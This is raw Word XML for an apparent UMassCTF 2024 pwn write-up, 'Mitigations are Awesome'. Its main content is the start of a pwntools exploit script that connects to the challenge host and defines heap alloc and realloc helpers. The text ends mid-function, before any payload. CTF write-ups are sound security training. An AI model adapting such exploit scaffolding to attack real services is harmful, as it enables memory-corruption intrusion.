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00B" w:rsidRDefault="007E200B" w:rsidP="007E200B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3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949"/>
        <w:gridCol w:w="7395"/>
      </w:tblGrid>
      <w:tr w:rsidR="007E200B" w:rsidTr="007E200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200B" w:rsidRDefault="007E200B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7E200B" w:rsidRDefault="007E200B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7E200B" w:rsidTr="007E200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E200B" w:rsidRDefault="007E200B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7E200B" w:rsidTr="007E200B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200B" w:rsidRPr="007E200B" w:rsidRDefault="007E200B" w:rsidP="007E200B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7E200B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200B" w:rsidRDefault="007E200B" w:rsidP="007E200B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UMassCTF</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> 2024</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007E200B" w:rsidTr="007E200B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200B" w:rsidRPr="007E200B" w:rsidRDefault="007E200B" w:rsidP="007E200B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7E200B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200B" w:rsidRDefault="007E200B" w:rsidP="007E200B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7E200B">
              <w:t>Mitigations are Awesome</w:t>
            </w:r>
            <w:bookmarkEnd w:id="0"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007E200B" w:rsidTr="007E200B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200B" w:rsidRDefault="007E200B" w:rsidP="007E200B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200B" w:rsidRDefault="007E200B" w:rsidP="007E200B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Pwn</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007E200B" w:rsidRPr="007E200B" w:rsidTr="007E200B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200B" w:rsidRDefault="007E200B" w:rsidP="007E200B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200B" w:rsidRDefault="007E20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https://ctftime.org/event/2287/tasks/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007E200B" w:rsidTr="007E200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E200B" w:rsidRDefault="007E200B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7E200B" w:rsidRPr="007E200B" w:rsidTr="007E200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E200B" w:rsidRDefault="007E200B">
            <w:pPr>
              <w:pStyle w:val="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1F2328"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="1F2328"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Can you help me fix my code?</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007E200B" w:rsidTr="007E200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E200B" w:rsidRDefault="007E200B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7E200B" w:rsidTr="007E200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E200B" w:rsidRDefault="007E200B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7E200B" w:rsidTr="007E200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200B">
              <w:rPr>
                <w:rStyle w:val="pl-k"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>from</w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-s1"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>pwn</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-k"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>import</w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-c1"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>*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200B">
              <w:rPr>
                <w:rStyle w:val="pl-c"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-c"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>nc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-c"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> mitigations-are-awesome.ctf.umasscybersec.org 1337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200B">
              <w:rPr>
                <w:rStyle w:val="pl-s1"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>elf</w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-c1"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-v"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>ELF</w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-s"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>"./</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-s"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>chall</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-s"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>)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200B">
              <w:rPr>
                <w:rStyle w:val="pl-c"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">#r = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-c"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>elf.process</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-c"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>()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200B">
              <w:rPr>
                <w:rStyle w:val="pl-s1"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>r</w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-c1"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-en"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>remote</w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-s"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>"mitigations-are-awesome.ctf.umasscybersec.org"</w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-c1"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>1337</w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>)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200B">
              <w:rPr>
                <w:rStyle w:val="pl-c"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>#</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-c"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>input(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-c"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>"press enter")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proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-k"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>def</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-en"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>alloc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-s1"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>size</w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>):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200B">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-s1"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>r</w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-en"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>sendlineafter</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-s"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>b" &gt; What action do you want to take?</w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-cce"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>\n</w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-s"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-s"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>b"1"</w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>)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200B">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-s1"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>r</w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-en"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>sendlineafter</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-s"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>b"What</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-s"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> size should the allocation be?</w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-cce"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>\n</w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-s"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-en"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>str</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-s1"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>size</w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>).</w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-en"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>encode</w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>())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proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-k"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>def</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-en"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>realloc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-s1"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>idx</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-s1"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>size</w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>):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200B">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-s1"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>r</w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-en"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>sendlineafter</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-s"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>b" &gt; What action do you want to take?</w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-cce"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>\n</w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-s"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-s"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>b"2"</w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>)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200B">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-s1"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>r</w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-en"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>sendlineafter</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-s"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>b"What</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-s"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> index do you wish to resize?</w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-cce"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>\n</w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-s"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-en"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>str</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-s1"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>idx</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>).</w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-en"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>encode</w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>())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200B">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-s1"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>r</w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-en"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>sendlineafter</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-s"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>b"What</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-s"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> should the new size be?</w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-cce"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>\n</w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-s"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-en"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>str</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-s1"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
